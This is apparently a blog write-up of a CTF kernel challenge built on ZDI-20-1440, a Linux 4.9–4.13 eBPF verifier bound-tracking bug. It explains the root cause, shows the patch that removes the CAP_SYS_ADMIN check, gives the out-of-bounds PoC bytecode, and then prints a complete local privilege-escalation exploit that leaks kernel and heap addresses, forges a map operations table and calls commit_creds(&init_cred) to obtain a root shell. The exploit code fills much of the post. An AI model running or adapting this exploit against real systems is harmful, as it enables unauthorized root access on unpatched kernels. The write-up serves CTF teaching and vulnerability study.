ZDI-20-1440 Writeup - HexRabbit's Blog

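I turned my first 1-day exploit into a CTF challenge, and since it feels a bit memorable I'm jotting down some notes. If anything is wrong or missing, please go easy on me. This is Day One, the challenge I wrote for this year's AIS3 EOF CTF final. Sadly, the contest was too short and nobody solved it during the event QQ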

Challenge overview

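The bug used here is ZDI-20-1440, a verification bypass in the extended Berkeley Packet Filter (eBPF) verifier found by Ryota Shiga (@Ga_ryo_), a TokyoWesterns member who currently also works at Flatt Security. Exploiting it ultimately gives local privilege escalation. (Unfortunately,) since the bug only exists in long-term maintenance versions of Linux (4.9 - 4.13), only Debian 9 is affected at the moment, and triggering it requires the relatively high privilege CAP_SYS_ADMIN.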

That didn't stop me from turning it into a challenge, though, so let's analyze how to exploit it :)

First look

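The challenge is basically an ordinary kernel pwnable: players get bzImage/rootfs.cpio.gz/run.sh. The only difference is an extra patch.diff, which just made the challenge easier to design. It removes the CAP_SYS_ADMIN requirement mentioned above so that an unprivileged user can trigger the bug. I also made sure the debug output printed by print_bpf_insn can't be used to leak kernel addresses (the first hunk ties the map-pointer masking to capable(CAP_SYS_ADMIN) instead of allow_ptr_leaks).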

diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
index 335c002..08dca71 100644
--- a/kernel/bpf/verifier.c
+++ b/kernel/bpf/verifier.c
@@ -352,7 +352,7 @@ static void print_bpf_insn(const struct bpf_verifier_env *env,
 			u64 imm = ((u64)(insn + 1)->imm << 32) | (u32)insn->imm;
 			bool map_ptr = insn->src_reg == BPF_PSEUDO_MAP_FD;
 
-			if (map_ptr && !env->allow_ptr_leaks)
+			if (map_ptr && !capable(CAP_SYS_ADMIN))
 				imm = 0;
 
 			verbose("(%02x) r%d = 0x%llx\n", insn->code,
@@ -3627,7 +3627,7 @@ int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
 	if (ret < 0)
 		goto skip_full_check;
 
-	env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);
+	env->allow_ptr_leaks = true;
 
 	ret = do_check(env);
 
@@ -3731,7 +3731,7 @@ int bpf_analyzer(struct bpf_prog *prog, const struct bpf_ext_analyzer_ops *ops,
 	if (ret < 0)
 		goto skip_full_check;
 
-	env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);
+	env->allow_ptr_leaks = true;
 
 	ret = do_check(env);

Besides this small kernel patch, the provided bzImage is a Linux 4.9.249 kernel with the BPF syscall enabled and the eBPF JIT on by default.

extended Berkeley Packet Filter (eBPF)

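Before discussing ZDI-20-1440, readers need some background on eBPF. I'm no expert in this area either, so for readers who aren't familiar with it yet, I recommend the following articles: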

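Linux 核心設計: 透過 eBPF 觀察作業系統行為 (Linux Kernel Design: Observing OS Behavior with eBPF)
- Course material from jserv's "Linux Kernel Design" course, with a thorough introduction to eBPF's history and design; highly recommended
BPF: A New Type of Software
- By Brendan Gregg, a kernel and performance engineer at Netflix who specializes in kernel-level performance tuning; he was an early promoter of BPF and is the author of the book BPF Performance Tools
CVE-2020-8835: LINUX KERNEL PRIVILEGE ESCALATION VIA IMPROPER EBPF PROGRAM VERIFICATION
- A writeup by Manfred Paul (@_manfp), who used this bug at Pwn2Own 2020 to escalate from an unprivileged user to a root shell on Linux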

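In short, you can think of eBPF as a small program that runs inside the kernel, with its own bytecode and a matching interpreter; the kernel parses and executes it at hook points chosen by the user. Well-known users include seccomp and tcpdump, which load classic BPF filters that the kernel translates into eBPF internally, and bpftrace, which uses eBPF to insert "probes" into the kernel that parse information and pass it back to userland.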

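Because this program runs inside the kernel, performance matters a lot, so the Linux kernel ships a JIT (Just-In-Time) compiler for it to eliminate the interpreter's translation and execution overhead. Obviously, though, if a user inserts buggy or malicious code, it could easily panic the kernel or even lead to EoP (Escalation-of-Privilege). To prevent this, the kernel runs two checks when loading a BPF program: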

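check_cfg() ensures that the BPF program contains no loops
do_check() checks for invalid instructions and, by tracking each register's type and range of possible values, guarantees the program never accesses memory out of bounds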

Root cause

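Back to this challenge's bug. As mentioned above, to ensure no instruction can access memory out of bounds, the BPF verifier records the range of possible values of every register (here meaning the registers defined by BPF). With that background, the root cause of ZDI-20-1440 is easy to understand. Here is the buggy code in kernel/bpf/verifier.c: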

    // ...
    case BPF_RSH:
        /* RSH by a negative number is undefined, and the BPF_RSH is an
         * unsigned shift, so make the appropriate casts.
         */
        if (min_val < 0 || dst_reg->min_value < 0)
            dst_reg->min_value = BPF_REGISTER_MIN_RANGE;
        else
            dst_reg->min_value = (u64)(dst_reg->min_value) >> min_val;  // <-- (3)
        if (dst_reg->max_value != BPF_REGISTER_MAX_RANGE)
            dst_reg->max_value >>= max_val;   // <-- (4)
        break;
    // ...

BPF_RSH is a BPF instruction whose operation is essentially equivalent to the following pseudocode:

dst_reg >>= src_reg

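The problem is a logic error in how the verifier updates the register's range of possible values (3, 4). For X >>= Y, X.max_val should normally become X.max_val >> Y.min_val, and likewise X.min_val should become X.min_val >> Y.max_val, since the largest result comes from the smallest shift and vice versa. Here, however, the code computes X.max_val >> Y.max_val and X.min_val >> Y.min_val instead, which lets the bounds check the verifier performs later (5) be bypassed with ease.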

static int do_check(struct bpf_verifier_env *env)
{
// ...
        } else if (class == BPF_STX) {
            /* check that memory (dst_reg + off) is writeable */
            err = check_mem_access(env, insn_idx, insn->dst_reg, insn->off,
                           BPF_SIZE(insn->code), BPF_WRITE,
                           insn->src_reg);   // <-- (5)
// ...
}

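This bug looks a lot like some JavaScript JIT compiler bugs: the bounds check validates its input with incorrect logic, so the optimizer/verifier works with wrong information and the check is ultimately bypassed. Simple and brutal.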

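(Actually, the bug can be triggered even without CONFIG_BPF_JIT, because once a program passes verification the interpreter performs no additional bounds checks at run time.)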

PoC

The ZDI blog post already gives a detailed PoC that triggers the bug. The flow is as follows:

First, create two bpf maps, then load the values we pass in from map1 into BPF_REG_8 and BPF_REG_9; these are the values that will fool the verifier. Finally, set BPF_REG_0 to the address of map2's array.

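A bpf map contains an array whose element size and count are user-defined. After registering it with the kernel via bpf_create_map(), the user can read and write it, so it serves as the bridge between userland and the BPF program.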

// put the address of bpf array to BPF_REG_0
#define BPF_GET_MAP(fd, idx) \
        BPF_LD_MAP_FD(BPF_REG_1, fd),                   /* r1 = map */          \
        BPF_MOV64_IMM(BPF_REG_2, idx),                                          \
        BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_2, -4),  /* *(u32 *)(fp - 4) = idx */ \
        BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),                                   \
        BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4),          /* r2 = &key */         \
        BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),    \
        BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1),          /* r0 == NULL -> exit */ \
        BPF_EXIT_INSN(),

BPF_GET_MAP(map1_fd, 1)
BPF_LDX_MEM(BPF_W, BPF_REG_8, BPF_REG_0, 0),    // r8 = map1[1]

BPF_GET_MAP(map1_fd, 2)
BPF_LDX_MEM(BPF_W, BPF_REG_9, BPF_REG_0, 0),    // r9 = map1[2]

BPF_GET_MAP(map2_fd, 0)                         // r0 = &map2[0]

Next, use the jmp family of instructions so that the verifier believes 0 ≤ BPF_REG_8 < 4096 and 0 ≤ BPF_REG_9 < 1024:

BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0, 1), 
BPF_JMP_IMM(BPF_JA, 0, 0, 9), // jmp to exit
BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0x1000, 8), 
 
BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 0, 1), 
BPF_JMP_IMM(BPF_JA, 0, 0, 5), // jmp to exit
BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 1024, 4),

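Because of the problem discussed above, after BPF_REG_8 >>= BPF_REG_9 the verifier believes 0 ≤ BPF_REG_8 ≤ 0, i.e. BPF_REG_8 = 0, so we can bypass the check and write 0xdeadbeef out of bounds at *(map2 + (BPF_REG_8 >> BPF_REG_9)). Out-of-bounds reads work the same way.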

BPF_ALU64_REG(BPF_RSH, BPF_REG_8, BPF_REG_9), // r8 >>= r9
BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8), // r0 += r8 
BPF_MOV64_IMM(BPF_REG_1, 0xdeadbeef),         // r1 = 0xdeadbeef
BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_1, 0), // *(r0) = r1
BPF_MOV64_IMM(BPF_REG_0, 0), 
BPF_EXIT_INSN(),

Exploit

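For the exploit, I originally enabled only SMEP when designing the challenge, but later found that it was exploitable with SMAP as well, so I wrote two versions: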

+smep

A quick look at some kernel functions that operate on struct bpf_map shows that bpf_map lives inside a larger structure, struct bpf_array:

static void *array_map_lookup_elem(struct bpf_map *map, void *key)
{
    struct bpf_array *array = container_of(map, struct bpf_array, map); // <-- note the container_of macro
    u32 index = *(u32 *)key;
    ...
}

Digging further, bpf_array.value turns out to be the memory region that stores the array's values:

struct bpf_array {
    struct bpf_map map;
    u32 elem_size;
    u32 index_mask;
    /* 'ownership' of prog_array is claimed by the first program that
     * is going to use this map or by the first program which FD is stored
     * in the map to make sure that all callers and callees have the same
     * prog_type and JITed flag
     */
    enum bpf_prog_type owner_prog_type;
    bool owner_jited;
    union {
        char value[0] __aligned(8);
        void *ptrs[0] __aligned(8);
        void __percpu *pptrs[0] __aligned(8);
    };
};

Since we can read and write at a chosen offset from this array, every member of bpf_array is a potential target, so let's keep tracing for something easy to abuse:

struct bpf_map {
    /* 1st cacheline with read-mostly members of which some
     * are also accessed in fast-path (e.g. ops, max_entries).
     */
    const struct bpf_map_ops *ops ____cacheline_aligned; // <--
    enum bpf_map_type map_type;
    u32 key_size;
    u32 value_size;
    u32 max_entries;
    u32 map_flags;
    u32 pages;
    bool unpriv_array;
    /* 7 bytes hole */

    /* 2nd cacheline with misc members to avoid false sharing
     * particularly with refcounting.
     */
    struct user_struct *user ____cacheline_aligned;
    atomic_t refcnt;
    atomic_t usercnt;
    struct work_struct work;
};

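In the end, bpf_map.ops turns out to point to the function table array_ops by default, which also happens to be a symbol the Linux kernel exports by default, so leaking it also reveals the kernel base. By replacing this function-table pointer with a location we control, we can easily take over RIP.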

static const struct bpf_map_ops array_ops = {
	.map_alloc = array_map_alloc,
	.map_free = array_map_free,
	.map_get_next_key = array_map_get_next_key,
	.map_lookup_elem = array_map_lookup_elem,
	.map_update_elem = array_map_update_elem,
	.map_delete_elem = array_map_delete_elem,
};

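And since only SMEP is enabled, the function table can simply be an array in userland, so there is no need to leak a kernel heap address at all. We then trigger our forged function through a syscall and chain the common xchg eax, esp gadget to pivot the stack into userland and ROP our way to a root shell.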

I'm leaving that exploit out for space; if you're interested, check my GitHub.

+smap

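With SMAP enabled, the forged function table can no longer be placed in userland and has to live on the kernel heap instead. Since we control the contents of the bpf map, that's a piece of cake; the only extra step is leaking a kernel heap address.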

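Attaching gdb to qemu makes it easy to spot a heap address stored in struct bpf_map: the first qword is map->ops (array_ops), and the qword at offset 0x40, the user pointer at the start of the second cacheline, is a heap pointer: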

Breakpoint 1, 0xffffffff8112b850 in array_map_update_elem ()
gef➤  x/20gx $rdi
0xffff88000e320a00:     0xffffffff81a12100      0x0000000400000002
0xffff88000e320a10:     0x0000000100000100      0x0000000100000000
0xffff88000e320a20:     0x0000000000000001      0x0000000000000000
0xffff88000e320a30:     0x0000000000000000      0x0000000000000000
0xffff88000e320a40:     0xffff88000e2aca80      0x0000000100000002
0xffff88000e320a50:     0x0000000000000000      0x0000000000000000
0xffff88000e320a60:     0x0000000000000000      0x0000000000000000
0xffff88000e320a70:     0x0000000000000000      0x0000000000000000
0xffff88000e320a80:     0x0000000000000100      0x0000000000000000
0xffff88000e320a90:     0x0000000000000000      0x0000000000000000

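Unfortunately, that pointer points into a page holding chunks of a different size, and because of kernel heap randomization we can't derive the address of the page we control from it. It's not hard to work around, though: we just need to read the fd (next-free) pointer of a free chunk in the same page.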

To make the kernel heap leak reliable, I first spray the heap with struct msg_msg, so that when the exploit allocates the two bpf maps (more precisely, two struct bpf_array) via bpf_create_map(), they always land on an almost untouched page. The fd pointer of a free chunk behind them then reliably leaks an address within the same page.

With a heap address, we can forge a function table inside the bpf map. But which functions should we jump to?

When these functions run, rdi points to struct bpf_map, so my idea was to control some of its fields and reuse functions that already operate on bpf maps to get an arbitrary write.

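My first thought: since we can overwrite the entire struct bpf_array anyway, why not use something like the memcpy in array_map_update_elem? As long as array->elem_size and index are under control, we could write to any address, right?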

/* Called from syscall or from eBPF program */
static int array_map_update_elem(struct bpf_map *map, void *key, void *value,
				 u64 map_flags)
            // ...

            memcpy(array->value +
                array->elem_size * (index & array->index_mask),
                value, map->value_size);

            // ...

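Only after finishing that exploit did I realize that most of these offsets are only int-sized (elem_size, index and index_mask are all u32), which isn't wide enough to reach an arbitrary kernel address…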

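Next I thought: since the goal is simply to run commit_creds(prepare_kernel_cred(0)), what if I first replace some function with prepare_kernel_cred, set rdi = 0 and record the return value, then do it once more with commit_creds and rdi set to that return value to escalate privileges?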

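But after searching high and low, I found that most of these functions return int, and those that return a pointer usually go on to operate on it, so they're unusable. As for controlling rdi, bpf_fd_array_map_update_elem and fd_array_map_delete_elem can be used, but they don't return any value, and rdi must be non-zero for the call to happen at all, so they certainly can't be used to call prepare_kernel_cred(0).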

static int fd_array_map_delete_elem(struct bpf_map *map, void *key)
{
	struct bpf_array *array = container_of(map, struct bpf_array, map);
	void *old_ptr;
	u32 index = *(u32 *)key;

	if (index >= array->map.max_entries)
		return -E2BIG;

	old_ptr = xchg(array->ptrs + index, NULL); // take the entry from the array and zero it; old_ptr is attacker-controlled
	if (old_ptr) {
		map->ops->map_fd_put_ptr(old_ptr); // if the entry was non-zero, call another callback from the function table
		return 0;
	} else {
		return -ENOENT;
	}
}

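At this point, since I never really knew what the 0 in prepare_kernel_cred(0) meant, I figured that if there were a way around it I might still have a chance (even though I still couldn't get the returned cred), so I went to read its implementation: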

struct cred *prepare_kernel_cred(struct task_struct *daemon)
{
    const struct cred *old;
    struct cred *new;

    new = kmem_cache_alloc(cred_jar, GFP_KERNEL);
    if (!new)
        return NULL;

    kdebug("prepare_kernel_cred() alloc %p", new);

    if (daemon)
        old = get_task_cred(daemon);
    else
        old = get_cred(&init_cred); // <----

    validate_creds(old);
    
    *new = *old;
    
    // ...
    
    return new;
    
    // ...
}

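Seeing that the parameter is a pointer made my heart sink, but I soon noticed that when the argument is zero, it uses get_cred(&init_cred) to obtain a cred that presumably has very high privileges, copies it into new, performs a few operations, and returns it shortly after...!!!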

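By now you have probably noticed that escalating privileges only takes a single call, commit_creds(&init_cred), since init_cred is the initial task's credential with uid 0 and a full capability set (this was news to me XD). So my final exploit flow is: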

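Call bpf_update_elem() to put &init_cred into the bpf map (while its ops still point to the real array_ops)
Forge a function table and point map->ops at it; in the forged function table:
- replace map_delete_elem with fd_array_map_delete_elem
- replace map_fd_put_ptr with commit_creds
Call bpf_delete_elem() to escalate privileges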
get root shell :)

Here's the flag nobody captured: AIS3{jibun_no_1_day_exploit_de_root_shell_wo_shutoku_suru_no_ha_omoshiroi_peko_jan?}

The final exploit (full source: smap.c):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>
#include <unistd.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/socket.h>
#include <sys/ipc.h>
#include <sys/types.h>
#include <sys/msg.h>
#include "bpf.h"

char buffer[64];
int sockets[2];
int ctrl_mapfd;
int vuln_mapfd;
size_t ctrlmap_ptr;
size_t vulnmap_ptr;
size_t leakbuf[0x100];
size_t ctrlbuf[0x100];
size_t kbase;
size_t pivot_esp;

struct message {
    long type;
    char text[0x800];
} msg;

void msg_alloc(int id, int size)
{
  if (msgsnd(id, (void *)&msg, size - 0x30, IPC_NOWAIT) < 0) {
    perror("msgsnd");
    exit(1);
  }
}

void heap_spray()
{
  int msqid;
  msg.type = 1;

  if ((msqid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) < 0) {
    perror("msgget");
    exit(1);
  }

  for (int i = 0; i < 0x13; ++i) {
    msg_alloc(msqid, 0x200);
  }
}

void get_shell() {
  printf("[*] get shell\n");
  system("sh");
}

void update_elem_ctrl()
{
  int key = 0;
  if (bpf_update_elem(ctrl_mapfd, &key, ctrlbuf, 0)) {
    printf("bpf_update_elem failed '%s'\n", strerror(errno));
  }
}

void get_elem_ctrl()
{
  int key = 0;
  if (bpf_lookup_elem(ctrl_mapfd, &key, leakbuf)) {
    printf("bpf_lookup_elem failed '%s'\n", strerror(errno));
  }
}

void debugmsg(void)
{
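  char buffer[64] = {0};  // payload is irrelevant; writing to sockets[0] runs the filter attached to sockets[1]
  ssize_t n = write(sockets[0], buffer, sizeof(buffer));

  if (n < 0) {
    perror("write");
    return;
  }
  if ((size_t)n != sizeof(buffer))
    fprintf(stderr, "short write: %zd\n", n);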
}

int load_prog()
{
  // make the bpf_maps land on a fresh page so the heap pointer leak is stable
  heap_spray();

  // size == 0x100, useful to set data on bpfarray
  ctrl_mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1, 0);
  if (ctrl_mapfd < 0) {
    puts("failed to create map1");
    return -1;
  }

  // size*count should be the same as ctrl_map
  vuln_mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), 0x100, 1, 0);
  if (vuln_mapfd < 0) {
    puts("failed to create map2");
    return -1;
  }

  // sizeof(struct bpf_array) == 0x200
  // offset of bpf_array.value == 0x90
  struct bpf_insn prog[] = {
    // DW == 8bytes
    BPF_GET_MAP(ctrl_mapfd, 0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_0, 0),
    BPF_LDX_MEM(BPF_DW, BPF_REG_9, BPF_REG_0, 8),
    BPF_LDX_MEM(BPF_DW, BPF_REG_6, BPF_REG_0, 0x10),
    BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),

    BPF_ST_MEM(BPF_W, BPF_REG_0, 0, 0x41414141),
    BPF_ST_MEM(BPF_W, BPF_REG_0, 4, 0x41414141),

    BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0, 1),
    BPF_JMP_IMM(BPF_JA, 0, 0, 9), // goto exit
    BPF_JMP_IMM(BPF_JGE, BPF_REG_8, 0x1000, 8),

    BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 0, 1),
    BPF_JMP_IMM(BPF_JA, 0, 0, 6), // goto exit
    BPF_JMP_IMM(BPF_JGE, BPF_REG_9, 0x400, 5),

    BPF_ALU64_REG(BPF_RSH, BPF_REG_8, BPF_REG_9), // r8 >>= r9
    BPF_ALU64_REG(BPF_ADD, BPF_REG_0, BPF_REG_8), // r0 += r8

    // switch leak / write
    BPF_JMP_IMM(BPF_JNE, BPF_REG_6, 0, 4),

    // leak
    BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_0, 0), // r4 = *r0
    BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0x10), // *(r7 + 0x10) = r4, i.e. ctrl value[2]
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),

    // write
    BPF_STX_MEM(BPF_DW, BPF_REG_0, BPF_REG_6, 0), // *r0 = r6
    BPF_MOV64_IMM(BPF_REG_0, 0),
    BPF_EXIT_INSN(),
  };
  return bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog) / sizeof(struct bpf_insn), "GPL");
}

void infoleak()
{
  update_elem_ctrl();
  debugmsg();
  get_elem_ctrl();
  debugmsg();
}

void overwrite_array_ops() {
  int n = 0;
  int key = 0;
  size_t init_cred = kbase + 0xe43e60;
  size_t fd_array_map_delete_elem = kbase + 0x12b730;
  size_t commit_creds = kbase + 0x81e70;

  // prepare fake array_ops
  ctrlbuf[n++] = 0x170 * 2; // r8: (0x170 * 2) >> 1 == 0x170, offset from ctrl value to vuln_map->ops
  ctrlbuf[n++] = 1;
  ctrlbuf[n++] = ctrlmap_ptr + 0x90 + 0x18; // ebpf code will overwrite bpf_array->map->ops with this ptr

  ctrlbuf[n++] = 0x4141414141414141;        // point to here
  ctrlbuf[n++] = 0x4241414141414141;
  ctrlbuf[n++] = 0x4341414141414141;
  ctrlbuf[n++] = 0x4441414141414141;
  ctrlbuf[n++] = 0x4541414141414141;
  ctrlbuf[n++] = 0x4641414141414141;
  ctrlbuf[n++] = fd_array_map_delete_elem;  // map_delete_elem
  ctrlbuf[n++] = 0x4841414141414141;
  ctrlbuf[n++] = commit_creds;              // map_fd_put_ptr

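  // put elem on vuln_map: the value is 0x100 bytes and its first qword is &init_cred
  size_t elem[0x100 / sizeof(size_t)] = { init_cred };
  bpf_update_elem(vuln_mapfd, &key, elem, 0);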
  debugmsg();

  // overwrite vulnmap->ops
  update_elem_ctrl();
  debugmsg();

  // fd_array_map_delete_elem call map->map_fd_put_ptr(first_elem) = commit_creds(&init_cred)
  bpf_delete_elem(vuln_mapfd, &key);
  debugmsg();

  get_shell();
}

int main() {
  int progfd = load_prog();

  if (progfd < 0) {
    printf("log:\n%s", bpf_log_buf);
    if (errno == EACCES)
      printf("failed to load prog '%s'\n", strerror(errno));
    return 1;
  }

  if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)) {
    perror("socketpair");
    return 1;
  }

  if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0) {
    perror("setsockopt");
    return 1;
  }

  ctrlbuf[0] = 0x170 * 2;
  ctrlbuf[1] = 1;
  infoleak();

  kbase = leakbuf[2] - 0xa12100;
  pivot_esp = kbase + 0x6ec938;
  printf("[+] leak kernel kbase: 0x%lx\n", kbase);

  ctrlbuf[0] = 0x570 * 2;
  ctrlbuf[1] = 1;
  infoleak();

  ctrlmap_ptr = leakbuf[2] - 0x800;
  vulnmap_ptr = ctrlmap_ptr + 0x200;
  printf("[+] leak kernel heap: 0x%lx\n", ctrlmap_ptr);

  overwrite_array_ops();
}